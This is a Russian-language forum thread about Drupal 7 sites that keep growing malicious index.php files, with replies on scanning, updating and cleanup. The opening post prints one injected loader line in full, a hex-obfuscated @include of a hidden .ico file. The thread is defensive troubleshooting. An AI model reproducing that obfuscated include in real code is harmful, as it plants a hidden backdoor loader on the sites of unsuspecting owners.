Помощь Drupal 7 и вредоносные index.php

[DarthOlolo]

Добрый день, подскажите пожалуйста, сталкивался ли кто-нибудь с подобной проблемой - имеется несколько сайтов на drupal 7, на разных хостингах, сайты настроенные под каталог товаров, приблизительно месяц назад на сайтах лежащих на beget появилось предупреждение, что в директории сайта имеются вредоносные файлы, просмотрев отчет ai-bolit увидели, что в большинстве папок создаются файлы index.php с примерно следующим содержанием

<?php
/*538be*/

@include "\x2fh\x6fm\x65/\x78/\x783\x380\x393\x39s\x2fp\x72i\x62o\x72p\x6fs\x74a\x76k\x61.\x72u\x2fp\x75b\x6ci\x63_\x68t\x6dl\x2fs\x69t\x65s\x2fa\x6cl\x2fl\x69b\x72a\x72i\x65s\x2f.\x324\x337\x39a\x347\x2ei\x63o";

/*538be*/

во всех разные вариации того, что в кавычках инклуда, но везде идет подключение это. Удаляли все эти файлы, обновили ядро, до 7.59, однако индексы продолжают создаваться. Помимо этого, на некоторых сайтах подобная вставка была и в index.php который лежит в корне сайта.
Подскажите, кто сталкивался с подобным явлением?

 

[prefer]

если у кого есть возможность раскодировать, прошу выложить.

 

[yarosof]

Тоже попал на этот вирус. Заливал во все папки index.html , менял права на файлы. Вылечил вручную, обновив систему, и просканировав Айболитом нашел вредонос в обной из папок вида 4Gtfh57sf2k.php .

 

[DarthOlolo]

Тоже попал на этот вирус. Заливал во все папки index.html , менял права на файлы. Вылечил вручную, обновив систему, и просканировав Айболитом нашел вредонос в обной из папок вида 4Gtfh57sf2k.php .

После обновы и удаления этого файла плодиться php'шники не перестали? Заметил, кстати, что такое только на двух хостингах - beget и shneider-host. На том же таймвебе всё ок, хотя практически все сайты сделаны по одному шаблону.

 

[RORC]

если у кого есть возможность раскодировать, прошу выложить.
у меня не получилось через разные сервисы раскодировать

Раскодировал

 

[RORC]

После обновы и удаления этого файла плодиться php'шники не перестали?

Множество причин, в том числе и от соседей могут приходить, если на другом хостинге нормально.
Нужно проверить логи, смотреть только на обращения вне витрины и пост запросы данных, возможно где-то закладка сделана.

 

[yarosof]

После обновы и удаления этого файла плодиться php'шники не перестали? Заметил, кстати, что такое только на двух хостингах - beget и shneider-host. На том же таймвебе всё ок, хотя практически все сайты сделаны по одному шаблону.

После удаления найденного файла, проблема пропала. Больше index.php не появлялся.
Хостинг у меня другой. (rustelecom)
Проблема возникла первый раз, другие сайты не затронула. Видимо из за дырки в самом Дрюпале.

 

[gluk_2005]

Добрый день. Столкнулся с подобной проблемой. В логах cron (обнаружил, что cron не стартует и полез в логи), drupal сам написал на что нужно ссылаться, удалял файлы .b178948a.ico и десятки их вариаций с удалением строки в index.php, но через пару дней в index.php снова создается обращение к этому файлу (файл под другим названием и в другой директории может находиться), кто-нибудь нашел сам исходный файл?

В общем, кому нужно, то мне помог Для просмотра ссылки Войди или Зарегистрируйся онлайн сервис по выдворению зловреда со страниц сайта. Сервис платный, но по заверению администрации ресурса, у пользователя есть 7 дней для demo пользования, не обманули, сервис работает в полном режиме все 7 дней. Схема простая: подключаешь сайт, я это делал с помощью php страницы от virusdie.com (можно по ftp), проверяешь его, антивирь показывает все пути к зараженным файлам, нажимаешь на файл, выделяется зловредный код, удаляешь его через ftp или панели хостинга и так пока не удалишь полностью все куски вредителя.

 

[_sashok]

дырки были в модулях друпала, где использовалась заливка на сайт файлов, типа аватарок или других изображений

помогает обновление ядра и модулей до самых свежих + полное удаление неиспользуемых на сайте модулей

 

[artkvadrart]

Не всегда это связано с дырами в Друпале. Часто на Шаред хостингах такое проявляется. Помогает замена хостера. Я сменил хостера, но у старого хостера еще был проплаченный период. Я все удалил, оставил просто пустые файлы php. Через два месяца в каталоге появились:
- файлы размером около 158к bootstrat.php defines.php и похожих названий;
- файлы размером около 2,58к response93.php article38.php css25.php заполонили все;
- в рабочие файлы php (в моем случае в пустые файлы php) записывается код закодированный eval.

Хостер не признал проблему даже после того, как я предоставил содержимое каталога (до этого пустого), хостер пытался свалить все на протокол FTP (но я им никогда не пользовался) и много всяких детских отмазок.


Предложили перейти на новый тариф (я думаю они поэтому ничего и не пытались решить, им это просто невыгодно). Замена хостера решила все проблемы.

При переезде на новый хостинг при сохранении файлов сделайте в антивирусе исключение для каталога в который сохраняете содержимое с вирусами. Иначе все уйдет в карантин. После удаление всех ненужных включений пробегитесь Айболитом (уже на новом хостинге). И забудете проблему.

 

[TheSol]

Проще заново собрать файловую часть, тем же DRUSH через комманду DL и название требуемых модулей, потом накатить сверху изменения если вносились вручную и уже потом базу заливать.